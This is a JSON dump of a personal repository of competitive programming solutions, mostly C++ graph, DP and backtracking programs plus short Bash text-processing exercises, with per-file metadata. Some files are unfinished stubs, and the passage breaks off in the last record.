"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\nconst int NMAX = 2e5 + 3;\r\nint dj[NMAX], n, m;\r\n\r\n//----------------------------------------\r\nint find(int u) {\r\n return dj[u] < 0 ? u: dj[u] = find(dj[u]);\r\n}\r\n//----------------------------------------\r\nvoid unionSet(int u, int v) {\r\n if (u == v) return;\r\n if (u > v) swap(u, v);\r\n dj[u] += dj[v];\r\n dj[v] = u;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int u, v;\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n cin >> n >> m; \r\n rep(i, 1, n)\r\n dj[i] = -1;\r\n\r\n while (m--) {\r\n cin >> u >> v;\r\n int pu = find(u), pv = find(v);\r\n unionSet(pu, pv);\r\n }\r\n\r\n if (dj[1] == -n) \r\n cout << \"Connected\";\r\n else {\r\n rep(i, 1, n)\r\n if (i != 1 && find(i) != 1)\r\n cout << i << endl;\r\n }\r\n\r\n}"
},
{
"alpha_fraction": 0.5569620132446289,
"alphanum_fraction": 0.6329113841056824,
"avg_line_length": 8.875,
"blob_id": "e5a99898e755d22c20ebcf615f62d0421eb74e9a",
"content_id": "277f60ff8028a6f36b7c5a74880e87e75d903d22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 79,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 8,
"path": "/bash/hackerrank/uniq.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#uniq1\nuniq\n#uniq2\nuniq -c | cut -c7-\n#uniq3\nuniq -ic | cut -c7\n#uniq4\nuniq -u\n"
},
{
"alpha_fraction": 0.3761172592639923,
"alphanum_fraction": 0.38755810260772705,
"avg_line_length": 23.91666603088379,
"blob_id": "311d3ab3f201f0493d40fe221619760ad98d6a3a",
"content_id": "24ce23f53204637fcf8d298720ae6a1fd247af1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2797,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 108,
"path": "/katis/reversingroads.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nconst int NMAX = 53;\r\nint n, m, cnt = 0, connectedComponent = 0;\r\nvector<int> ds[NMAX];\r\nint low[NMAX], num[NMAX];\r\nstack<int> st;\r\nbool incomp[NMAX];\r\nvector<pair<int, int>> edges;\r\n//----------------------------------------\r\nvoid openf() {\r\n int u, v;\r\n rep(i, 0, m - 1) \r\n ds[i].clear();\r\n edges.clear();\r\n rep(i, 1, n) {\r\n cin >> u >> v;\r\n ds[u].push_back(v);\r\n edges.push_back(make_pair(u, v));\r\n //cout << u << \" \" << v << endl;\r\n }\r\n}\r\n//----------------------------------------\r\nvoid scc(int u, int cu, int cv) {\r\n st.push(u);\r\n incomp[u] = 1;\r\n\r\n low[u] = num[u] = ++cnt;\r\n for (auto v: ds[u]) {\r\n if (u == cu && v == cv) continue;\r\n if (num[v] == -1) {\r\n scc(v, cu, cv);\r\n low[u] = min(low[u], low[v]);\r\n } else if (incomp[v])\r\n low[u] = min(low[u], num[v]);\r\n }\r\n if (u == cv) {\r\n auto v = cu;\r\n if (num[v] == -1) {\r\n scc(v, cu, cv);\r\n low[u] = min(low[u], low[v]);\r\n } else if (incomp[v]) \r\n low[u] = min(low[u], num[v]);\r\n }\r\n\r\n //cout << u << \" \" << low[u] << \" \" << num[u] << endl;\r\n if (num[u] == low[u]) {\r\n connectedComponent++;\r\n while (true) {\r\n auto curr = st.top();\r\n incomp[curr] = 0;\r\n st.pop();\r\n if (curr == u) break;\r\n }\r\n }\r\n}\r\n//----------------------------------------\r\nbool isValid(int cu, int cv) {\r\n cnt = connectedComponent = 0;\r\n while (!st.empty()) st.pop();\r\n memset(num, -1, sizeof(num));\r\n memset(low, -1, sizeof(low));\r\n memset(incomp, 0, sizeof(incomp));\r\n\r\n rep(i, 0, m - 1) \r\n if (num[i] == -1) scc(i, cu, cv);\r\n\r\n //cout << \"CC \" << connectedComponent << endl;\r\n return (connectedComponent == 1);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n if (isValid(-1, -1)) {\r\n cout << \"valid\";\r\n return;\r\n }\r\n for (auto x:edges) \r\n if (isValid(x.first, x.second)) {\r\n cout << x.first << \" \" << x.second;\r\n return;\r\n }\r\n cout << \"invalid\";\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n int testCase = 0;\r\n while (cin >> m) {\r\n cin >> n;\r\n openf();\r\n //cout << m << \" \" << n << endl;\r\n testCase++;\r\n cout << \"Case \" << testCase << \": \";\r\n process();\r\n cout << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.3326381742954254,
"alphanum_fraction": 0.3555787205696106,
"avg_line_length": 20.34883689880371,
"blob_id": "8ca8912ab8dce0eeb235749d311b232fd0f172c1",
"content_id": "d437490b35ccd7896ba752c91fe0ba9fab347f61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 959,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 43,
"path": "/katis/batmanacci.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst ll oo = 1e18;\r\nconst int NMAX = 1e5 + 3;\r\nll a[NMAX], k;\r\nint n;\r\n//----------------------------------------\r\nchar getResult(int n, ll k) {\r\n while (n >= 3) {\r\n if (k > a[n - 2]) {\r\n k -= a[n - 2];\r\n n -= 1;\r\n } else n -= 2;\r\n }\r\n\r\n if (n == 1) return 'N';\r\n return 'A';\r\n}\r\n//----------------------------------------\r\n\r\nvoid process() {\r\n a[1] = a[2] = 1;\r\n rep(i, 3, 1e5) {\r\n if (a[i - 1] <= oo - a[i - 2])\r\n a[i] = a[i - 2] + a[i - 1];\r\n else a[i] = oo;\r\n }\r\n\r\n cout << getResult(n, k);\r\n}\r\n//----------------------------------------\r\nint main() {\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n cin >> n >> k;\r\n process();\r\n}"
},
{
"alpha_fraction": 0.3692190945148468,
"alphanum_fraction": 0.3828658163547516,
"avg_line_length": 21.589284896850586,
"blob_id": "d83d1e9e967e2e33a6e411da7475aebce8698a23",
"content_id": "dcb98273cfacd7154be73525473eac5dc51c27aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1319,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 56,
"path": "/katis/virtualfriends.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\nconst int NMAX = 1e5 + 3;\r\n\r\nmap<string, int> mapName;\r\nint n;\r\nint dj[NMAX];\r\n//----------------------------------------\r\nint getParent(int u) {\r\n return dj[u] < 0 ? u : dj[u] = getParent(dj[u]);\r\n}\r\n//----------------------------------------\r\nint unionSet(int u, int v) {\r\n if (u == v) return abs(dj[u]);\r\n\r\n if (dj[u] > dj[v]) swap(u, v);\r\n dj[u] += dj[v];\r\n dj[v] = u;\r\n\r\n return abs(dj[u]);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n cin >> n;\r\n string s1, s2;\r\n int cnt = 0;\r\n mapName.clear();\r\n rep(i, 1, n) { \r\n cin >> s1 >> s2;\r\n if (mapName.find(s1) == mapName.end()) {\r\n mapName[s1] = ++cnt;\r\n dj[cnt] = -1;\r\n }\r\n if (mapName.find(s2) == mapName.end()) {\r\n mapName[s2] = ++cnt;\r\n dj[cnt] = -1;\r\n }\r\n\r\n int u = getParent(mapName[s1]);\r\n int v = getParent(mapName[s2]);\r\n\r\n cout << unionSet(u, v) << endl;\r\n }\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int test;\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n cin >> test;\r\n while (test--) {\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.33818182349205017,
"alphanum_fraction": 0.35418182611465454,
"avg_line_length": 22.724138259887695,
"blob_id": "dfbbc3a876897d79c01f6b92dafc9d9cf6eb8e0b",
"content_id": "9e832efa1a5599d86f4373d459adb6de6840a58f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1375,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 58,
"path": "/codeforces/1510K.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i <= b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i >= b; i -= step)\n#define it(x, s) for (auto x:s)\n\n\nconst int NMAX = 1e3 + 3;\nvector<int> a;\nint n; \n\nvoid openf() {\n // freopen(\"test.inp\", \"r\", stdin);\n int u;\n cin >> n;\n rep(i, 1, 2 * n, 1) {\n cin >> u;\n a.push_back(u);\n }\n}\n//--------------------------------------------------\nvoid rotate(vector<int>&b, int t) {\n if (t == 0) { //xoay kieu 1\n rep(i, 0, 2 * n - 1, 2) {\n swap(b[i], b[i + 1]);\n }\n }\n else {\n swap_ranges(b.begin(), b.begin() + n, b.begin() + n);\n } \n}\n//--------------------------------------------------\nvoid process() {\n vector<int> b(a);\n vector<int> c(a);\n sort(c.begin(), c.end());\n rep(num_iter, 0, 2 * n, 1) {\n // cout << num_iter << \": \";\n // it(x, b) \n // cout << x << \" \";\n // cout << endl;\n if (c == b) {\n if (n & 1 == 1)\n cout << min(num_iter, 2 * n - num_iter);\n else \n cout << min(num_iter, 4 - num_iter);\n return;\n }\n rotate(b, num_iter & 1);\n }\n cout << -1;\n}\n//--------------------------------------------------\nint main() {\n openf();\n process();\n}"
},
{
"alpha_fraction": 0.44158416986465454,
"alphanum_fraction": 0.4554455578327179,
"avg_line_length": 19.239999771118164,
"blob_id": "abf51c9dbd7f1119cf558ff18e691bf6ac73e209",
"content_id": "858293065ae715b1e8b8d2ec5ca6ef5c95349c19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 25,
"path": "/uva/679.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nconst int NMAX = (1 << 20) + 3;\nbitset<NMAX> bs;\n\nint main() {\n int test, D, I;\n cin >> test;\n while (test--) {\n cin >> D >> I;\n bs.reset();\n int cur = I;\n int number_of_node = 1;\n while (cur < (1 << D - 1)) {\n int pos = \n \n }\n } \n}"
},
{
"alpha_fraction": 0.47096773982048035,
"alphanum_fraction": 0.49677419662475586,
"avg_line_length": 13.090909004211426,
"blob_id": "b6fa0d9b2f6db4669d5c80efc80b0f522da3cffd",
"content_id": "cd2dbe5501f7c4e9257312d6fe035a0b05fce46a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 11,
"path": "/bash/hackerrank/average.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "read number\ni=1\nsum=0\nwhile [[ $i -le $number ]]\ndo\n\tread x\n\tsum=$(( sum + x ))\n\t(( i = i + 1 ))\ndone\nres=$(bc -l <<< \"$sum / $number\")\nprintf \"%.3f\" $res\n"
},
{
"alpha_fraction": 0.3231883943080902,
"alphanum_fraction": 0.3485507369041443,
"avg_line_length": 19.59375,
"blob_id": "de362cc7d60f04226f2630c8064bbbfb6c110036",
"content_id": "0a27c6d760250f9bdc349ec16939208d179d1396",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1380,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 64,
"path": "/katis/buttonbashing.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nconst int NMAX = 36e2 + 4;\r\n\r\nint n, t;\r\nint d[NMAX];\r\nint a[20];\r\nqueue<int> q;\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> n >> t;\r\n rep(i, 1, n)\r\n cin >> a[i];\r\n}\r\n//----------------------------------------\r\nvoid BFS(int root) {\r\n memset(d, 0, sizeof(d));\r\n d[root] = 1;\r\n q.push(root);\r\n\r\n while (!q.empty()) {\r\n auto u = q.front();\r\n rep(i, 1, n) {\r\n int v = min(3600, max(0, u + a[i]));\r\n if (d[v] == 0) {\r\n d[v] = d[u] + 1;\r\n q.push(v);\r\n }\r\n }\r\n q.pop();\r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n memset(d, 0, sizeof(d));\r\n BFS(0);\r\n\r\n rep(i, t, 3600)\r\n if (d[i]) {\r\n cout << d[i] - 1 << \" \" << i - t << endl;\r\n break;\r\n }\r\n} \r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.4615384638309479,
"alphanum_fraction": 0.4781859815120697,
"avg_line_length": 30.10714340209961,
"blob_id": "657f2ac12df29ea2edc6405b19ff2c0ccd6badd5",
"content_id": "71dba0855e740074ecc2bc170ab208d6c7aa5fa2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1742,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 56,
"path": "/leetcode/37.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <vector>\n#include <set>\n#include <iostream>\nusing namespace std;\n\n\nclass Solution {\npublic:\n bool solved = false;\n void solveSudoku(vector<vector<char>>& board) {\n trySolveACell(board, 0, 0);\n }\n\nprivate:\n vector<pair<int, int>> get_list_relative_cell(pair<int, int> cell) {\n vector<pair<int, int>> res = {};\n for (int i = 0; i < 9; i++) {\n res.push_back(make_pair(i, cell.second));\n res.push_back(make_pair(cell.first, i));\n res.push_back(make_pair(cell.first / 3 * 3 + i / 3, cell.second / 3 * 3 + i % 3));\n }\n return res;\n }\n\n pair<int, int> getNextCell(int i, int j) {\n if (i == 8 && j == 8) return make_pair(-1 , -1);\n if (j != 8) return make_pair(i, j + 1);\n else return make_pair(i + 1, 0);\n }\n\n void trySolveACell(vector<vector<char>>& board, int i, int j) {\n if (solved) return;\n if (i == -1) {\n solved = true;\n return;\n }\n bool isSet = board[i][j] != '.';\n set<char> available_value = { '1', '2', '3', '4', '5', '6', '7', '8', '9' };\n if (!isSet) {\n for (auto p: get_list_relative_cell(make_pair(i, j))) {\n available_value.erase(board[p.first][p.second]);\n }\n } else {\n available_value = { board[i][j] };\n }\n if (available_value.size() > 0) {\n for (auto value: available_value) {\n if (solved) return;\n board[i][j] = value;\n auto nextCell = getNextCell(i, j);\n trySolveACell(board, nextCell.first, nextCell.second);\n if (!isSet && !solved) board[i][j] = '.';\n }\n }\n }\n};\n"
},
{
"alpha_fraction": 0.3178410828113556,
"alphanum_fraction": 0.34232884645462036,
"avg_line_length": 21.541175842285156,
"blob_id": "72c8616443895f0b66eb1859a99ea22d1ed62c3a",
"content_id": "4daf771beae16f93f838f5e39f3b6ea363bc0699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2001,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 85,
"path": "/katis/coast.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\nconst int NMAX = 1e3 + 3;\r\n\r\nint m, n;\r\nchar a[NMAX][NMAX];\r\nbool sea[NMAX][NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> m >> n;\r\n rep(i, 1, m) \r\n rep(j, 1, n)\r\n cin >> a[i][j];\r\n}\r\n//----------------------------------------\r\nbool inside(int u, int v) {\r\n return (u >= 1 && u <= m && v >=1 && v <= n);\r\n}\r\n//----------------------------------------\r\nvoid DFS(int u, int v) {\r\n if (sea[u][v]) return;\r\n if (a[u][v] == '1') return;\r\n sea[u][v] = 1;\r\n\r\n rep(i, 0, 3) {\r\n int du = u + dx[i];\r\n int dv = v + dy[i];\r\n if (inside(du, dv))\r\n DFS(du, dv);\r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n rep(i, 1, m) a[i][0] = a[i][n + 1] = '0';\r\n rep(i, 1, n) a[0][i] = a[m + 1][i] = '0';\r\n\r\n rep(i, 1, m) DFS(i, 0), DFS(i, n + 1);\r\n rep(i, 1, n) DFS(0, i), DFS(m + 1, i);\r\n\r\n int res = 0;\r\n rep(u, 1, m)\r\n rep(v, 1, n) { \r\n rep(i, 1, 2) {\r\n int du = u + dx[i];\r\n int dv = v + dy[i];\r\n if (inside(du, dv))\r\n res += (sea[u][v ]!= sea[du][dv]);\r\n }\r\n if (u == 1) res += (sea[u][v] ^ 1);\r\n if (u == m) res += (sea[u][v] ^ 1);\r\n if (v == 1) res += (sea[u][v] ^ 1);\r\n if (v == n) res += (sea[u][v] ^ 1);\r\n }\r\n cout << res; \r\n\r\n\t/*rep(u, 1, m) {\r\n\t\trep(v, 1, n) \r\n\t\t\tcout << sea[u][v];\r\n\t\tcout << endl;\r\n\t}*/\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /*\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n \r\n openf();\r\n process();\r\n}\r\n"
},
{
"alpha_fraction": 0.3280116021633148,
"alphanum_fraction": 0.3671988248825073,
"avg_line_length": 24.518518447875977,
"blob_id": "6c72e0dc0e71bb7e276646805f2a831e622f3ffd",
"content_id": "c21bde226c868c6fe5512e91b2d09121830f01c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1378,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 54,
"path": "/uva/10911.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\n#include <cmath>\n#include <iomanip>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i <= b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i >= b; i -= step)\n\nconst int NMAX = 18;\nint n, px[NMAX], py[NMAX];\ndouble f[1 << NMAX];\n\n\ndouble dis(int i, int j) {\n return sqrt(pow(px[i] - px[j], 2) + pow(py[i] - py[j], 2));\n}\n\nvoid process() {\n rep(i, 0, (1 << 2 * n) - 1, 1)\n f[i] = -1;\n f[0] = 0;\n rep(i, 0, (1 << 2 * n) - 1, 1) {\n if (f[i] == -1) continue;\n rep(j1, 0, 2 * n - 1, 1)\n rep(j2, j1 + 1, 2 * n - 1, 1) \n if (((i >> j1 & 1) == 0) && ((i >> j2 & 1) == 0)) {\n int new_i = i + (1 << j1) + (1 << j2);\n double d = f[i] + dis(j1, j2); \n if (f[new_i] == -1)\n f[new_i] = d;\n else \n f[new_i] = min(f[new_i], d);\n }\n }\n}\n\n\nint main() {\n freopen(\"test.inp\", \"r\", stdin);\n int test; \n test = 0;\n while (cin >> n) {\n if (n == 0) break;\n test += 1;\n string name;\n rep(i, 0, 2 * n - 1, 1) {\n cin >> name;\n cin >> px[i] >> py[i];\n }\n process();\n cout << fixed << setprecision(2);\n cout << \"Case \" << test << \": \" << f[(1 << 2 * n) - 1] << endl;\n }\n}\n"
},
{
"alpha_fraction": 0.35555556416511536,
"alphanum_fraction": 0.37037035822868347,
"avg_line_length": 25.03636360168457,
"blob_id": "f4bb5069c280e4db24b92e154876e25dadfd049b",
"content_id": "1c252a371f11c2de65c7df227ed57e352b0568b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1485,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 55,
"path": "/katis/kastenlauf.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\nconst int NMAX = 1e2 + 5;\r\nint posx[NMAX], posy[NMAX], n, dj[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n cin >> n;\r\n cin >> posx[1] >> posy[1];\r\n cin >> posx[2] >> posy[2];\r\n rep(i, 1, n)\r\n cin >> posx[2 + i] >> posy[2 + i];\r\n}\r\n//----------------------------------------\r\nbool connected(int u, int v) {\r\n return (abs(posx[u] - posx[v]) + abs(posy[u] - posy[v]) <= 1000);\r\n}\r\n//----------------------------------------\r\nint findParent(int u) {\r\n return (dj[u] < 0 ? u: dj[u] = findParent(dj[u]));\r\n}\r\n//----------------------------------------\r\nvoid unionSet(int u, int v) {\r\n if (u == v) return;\r\n if (dj[u] > dj[v]) swap(u, v);\r\n dj[u] += dj[v];\r\n dj[v] = u;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n memset(dj, -1, sizeof(dj));\r\n rep(u, 1, n + 2)\r\n rep(v, 1, n + 2)\r\n if (connected(u, v)) {\r\n int nu = findParent(u), nv = findParent(v);\r\n unionSet(nu, nv);\r\n }\r\n\r\n if (findParent(1) == findParent(n + 2)) cout << \"happy\";\r\n else cout << \"sad\";\r\n cout << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int test;\r\n cin >> test;\r\n while (test--) {\r\n openf();\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.36942675709724426,
"alphanum_fraction": 0.37290099263191223,
"avg_line_length": 30.018518447875977,
"blob_id": "ba34988527155161d1e5c09ac02fdcc310a9ab47",
"content_id": "097d080691f0b4ef2dbe2da8406a773225ee6133",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1727,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 54,
"path": "/katis/addingwords.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nmap<string, int> stringToInt;\r\nmap<int, string> intToString;\r\nconst int oo = -1e9;\r\n\r\n//----------------------------------------\r\nint main() {\r\n string s, variable;\r\n int value;\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n\r\n while (cin >> s) {\r\n if (s == \"clear\") {\r\n stringToInt.clear();\r\n intToString.clear();\r\n }\r\n else if (s == \"def\") {\r\n cin >> variable >> value;\r\n if (stringToInt.find(variable) != stringToInt.end()) {\r\n intToString.erase(stringToInt[variable]);\r\n }\r\n stringToInt[variable] = value;\r\n intToString[value] = variable;\r\n }\r\n else {\r\n int temp = 0, currentSign = 1;\r\n string res = \"\";\r\n while (cin >> variable) {\r\n res += (variable + \" \");\r\n if (variable == \"+\" || variable == \"-\") { \r\n currentSign = variable == \"+\" ? 1: -1;\r\n }\r\n else if (variable == \"=\") {\r\n if (intToString.find(temp) == intToString.end())\r\n res += \"unknown\\n\";\r\n else res += intToString[temp] + \"\\n\";\r\n cout << res;\r\n break;\r\n }\r\n else {\r\n if (temp == oo) continue;\r\n if (stringToInt.find(variable) == stringToInt.end()) {\r\n temp = oo;\r\n continue;\r\n } else {\r\n temp += currentSign * stringToInt[variable];\r\n }\r\n } \r\n }\r\n }\r\n }\r\n}"
},
{
"alpha_fraction": 0.4372684061527252,
"alphanum_fraction": 0.44626787304878235,
"avg_line_length": 22.243589401245117,
"blob_id": "53054950c7c6fe362e7934b1875241f34cec934f",
"content_id": "e05d6d87fcfc92f68419369163e3e570267cb70c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1889,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 78,
"path": "/katis/torn2pieces.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\n\r\nint n;\r\nvector<string> pathTrace;\r\nmap<string, vector<string>> routes;\r\nset<string> setLocation;\r\nstring startLocation, finishLocation;\r\nbool ok = false;\r\n//----------------------------------------\r\nvoid openf() {\r\n string s;\r\n cin >> n;\r\n cin.ignore();\r\n rep(i, 1, n) {\r\n pathTrace.clear();\r\n getline(cin, s);\r\n string tmp = \"\";\r\n for (auto x:s) {\r\n if (x == ' ') {\r\n pathTrace.push_back(tmp);\r\n tmp = \"\";\r\n }\r\n else tmp += x;\r\n }\r\n pathTrace.push_back(tmp);\r\n rep(j, 1, pathTrace.size() - 1) {\r\n routes[pathTrace[0]].push_back(pathTrace[j]); \r\n routes[pathTrace[j]].push_back(pathTrace[0]);\r\n }\r\n }\r\n}\r\n//----------------------------------------\r\nvoid DFS(string u) {\r\n if (setLocation.find(u) != setLocation.end()) return;\r\n setLocation.insert(u);\r\n pathTrace.push_back(u);\r\n\r\n if (u == finishLocation) {\r\n ok = 1;\r\n for (auto x: pathTrace) cout << x << \" \";\r\n }\r\n\r\n for (auto v: routes[u]) DFS(v);\r\n\r\n pathTrace.pop_back();\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n pathTrace.clear();\r\n cin >> startLocation >> finishLocation;\r\n DFS(startLocation);\r\n\r\n if (!ok) cout << \"no route found\";\r\n}\r\n//----------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n /*\r\n int testCase;\r\n cin >> testCase;\r\n rep(test, 1, testCase) {\r\n openf();\r\n process();\r\n } */\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.3076923191547394,
"alphanum_fraction": 0.36538460850715637,
"avg_line_length": 7.666666507720947,
"blob_id": "be4c9c91df28b505ce2e681b1dafb20e9daef69f",
"content_id": "e8bd94ad09c59e8dad73f55f22f8a921697cb982",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 6,
"path": "/bash/hackerrank/tr.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#tr1\ntr \"()\" \"[]\"\n#tr2\ntr -d \"[a-z]\"\n#tr3\ntr -s \" \"\n"
},
{
"alpha_fraction": 0.5822784900665283,
"alphanum_fraction": 0.6202531456947327,
"avg_line_length": 17.25,
"blob_id": "871078f4c3769f88d14193712478a329c0df5012",
"content_id": "6e30301765dfe447b71705a19a7e3fbaddd65a87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 79,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 4,
"path": "/codeforces/266466B.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nconst int NMAX = 5e4 + 3;\r\n\r\n"
},
{
"alpha_fraction": 0.33239832520484924,
"alphanum_fraction": 0.3669939339160919,
"avg_line_length": 30.940298080444336,
"blob_id": "2fa51ff07174e921129568fba97b60e7bbfb1023",
"content_id": "e7789c109fe76a82298d469ef058d34966b132b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2139,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 67,
"path": "/leetcode/864.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
